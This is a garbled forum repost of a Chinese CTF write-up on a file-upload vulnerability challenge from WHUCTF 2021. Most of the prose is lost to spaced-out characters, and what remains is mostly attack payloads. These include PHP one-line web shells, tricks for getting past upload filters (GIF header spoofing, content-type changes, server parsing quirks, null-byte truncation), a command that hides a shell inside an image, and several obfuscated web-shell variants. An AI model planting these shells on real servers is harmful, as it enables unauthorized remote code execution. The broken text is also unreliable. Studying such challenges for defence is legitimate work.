搜索

[22077] 2021-06-19_WHUCTF一道非常有趣的文件上传漏洞题(刀蝎剑详解)

文档创建者:s7ckTeam
浏览次数:56
最后更新:2025-01-18
2021-06-19_WHUCTF一道非常有趣的文件上传漏洞题(刀蝎剑详解) W H U C T F   E a s t m o u n t   L e m o n S e c   2 0 2 1 - 0 6 - 1 9 . E a s y _ u n s e r i a l i z e . 1 . 2 . 3 . 4 . B u r p S u i t e . W P . g i t h u b h t t p s : / / g i t h u b . c o m / e a s t m o u n t y x z / S y s t e m S e c u r i t y - R e v e r s e A n a l y s i s h t t p s : / / g i t h u b . c o m / e a s t m o u n t y x z / N e t w o r k S e c u r i t y S e l f - s t u d y 绿 访 . E a s y _ u n s e r i a l i z e   +
u p l o a d ,   v i e w
. E a s y _ u n s e r i a l i z e W P ~ 1 . ( 1 )   P H P ( 2 )   s h e l l m a 0 1 . p h p < ? p h p   e v a l ( $ _ P O S T [ w h u c t f ] ) ;   ? > U R L w h u c t f < f o r m   a c t i o n = " u p l o a d . p h p "   m e t h o d = " p o s t "   a c c e p t - c h a r s e t = " u t f - 8 "   e n c t y p e = " m u l t i p a r t / f o r m - d a t a " >         < l a b e l   n a m e = " t i t l e "   f o r = " f i l e " > :       < / l a b e l >         < i n p u t   t y p e = " f i l e "   n a m e = " f i l e "   i d = " f i l e " >         < i n p u t   t y p e = " s u b m i t "   c l a s s = " b u t t o n "   n a m e = " s u b m i t "   v a l u e = " " > < / f o r m > / / h t t p : / / l o c a l h o s t / e a s y _ u n s e r i a l i z e / m a 0 1 . p h p < ? p h p   e v a l ( $ _ P O S T [ w h u c t f ] ) ;   ? > / / h t t p : / / l o c a l h o s t / e a s y _ u n s e r i a l i z e / m a 0 2 . p h p < ? p h p   a s s e r t ( $ _ P O S T [ w h u c t f ] ) ;   ? >
( 3 )   s h e l l w e b s h e l l 使 使 U R L s h e l l
h t t p s : / / g i t h u b . c o m / r e b e y o n d / B e h i n d e r 2 . ( 1 )   m a 0 1 . p h p Y o u   c a n t u p l o a d   t h i s   k i n d   o f   f i l e !
m m . j p g ( 2 )   f o x . p h p 1 . j p g J P G P H P
g i f p n g j p g g i f G I F 8 9 a B u r p S u i t e . p h p ( 3 )   c o n t e n t - t y p e j p g s h e l l < ? p h p   e v a l ( $ _ P O S T [ f o x ] ) ;   ? >  
使 P H P I I S 1 . a s p ; 1 . j p g a s p j p g A p a c h e 1 . p h p . x x x x x x p h p N g n i x s h e l l . j p g 访 s h e l l . j p g / 1 . p h p s h e l l . j p g % 0 0 . p h p p h p j p g ( 4 )   P H P C M D m m . j p g m m 0 1 . p h p   < ? p h p e v a l ( $ _ P O S T [ w h u c t f ] ) ;   ? >   m m - m a 0 1 . j p g b a a s c i i N o t e p a d + + m m - m a 0 1 . j p g c o p y   m m . j p g / b + m a 0 1 . p h p / a   m m - m a 0 1 . j p g
m m - m a 0 1 . j p g Y o u   c o u l d   n o t   u p l o a d   t h i s   i m a g e   b e c a u s e   o f   s o m e   d a n g e r o u s   c o d e   i n y o u r   f i l e ! e v a l 3 . / / < ? p h p   $ a = ' b ' ;   $ $ a = ' a s s e r t ' ;   $ b ( $ _ P O S T [ s h e l l ] ) ;   ? > < ? p h p   $ a   =   " e v a l " ;   $ a ( @ $ _ P O S T [ ' s h e l l ' ] ) ;   ? > / / s t r _ r e p l a c e < ? p h p   $ a = s t r _ r e p l a c e ( " W a l d o " ,   " " ,   " e W a l d o v a l " ) ;   $ a ( @ $ _ P O S T [ ' s h e l l ' ] ) ;   ? > / / b a s e 6 4 _ d e c o d e < ? p h p   $ a = b a s e 6 4 _ d e c o d e ( " Z X Z h b A = = " ) ;   $ a ( $ _ P O S T [ ' s h e l l ' ] ) ; ? > / / < ? p h p   $ a = " e " . " v " ;   $ b = " a " . " l " ;   $ c = $ a . $ b ;   $ c ( $ _ P O S T [ ' s h e l l ' ] ) ;   ? > / / p a r s e _ s t r < ? p h p   $ s t r = " a = e v a l " ;   p a r s e _ s t r ( $ s t r ) ;   $ a ( $ _ P O S T [ ' s h e l l ' ] ) ;   ? > / / 使 < s c r i p t   l a n g u a g e = " P H P " >   @ e v a l ( $ _ P O S T [ ' s h e l l ' ] ) ;   < / s c r i p t > / / s h e l l . p h p < ? p h p   f p u t s ( f o p e n ( ' s h e l l . p h p ' , ' w ' ) , ' < ? p h p   a s s e r t ( $ _ P O S T [ w h u c t f ] ) ; ? > ' ) ;   ? > / / 使 @   p h p

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理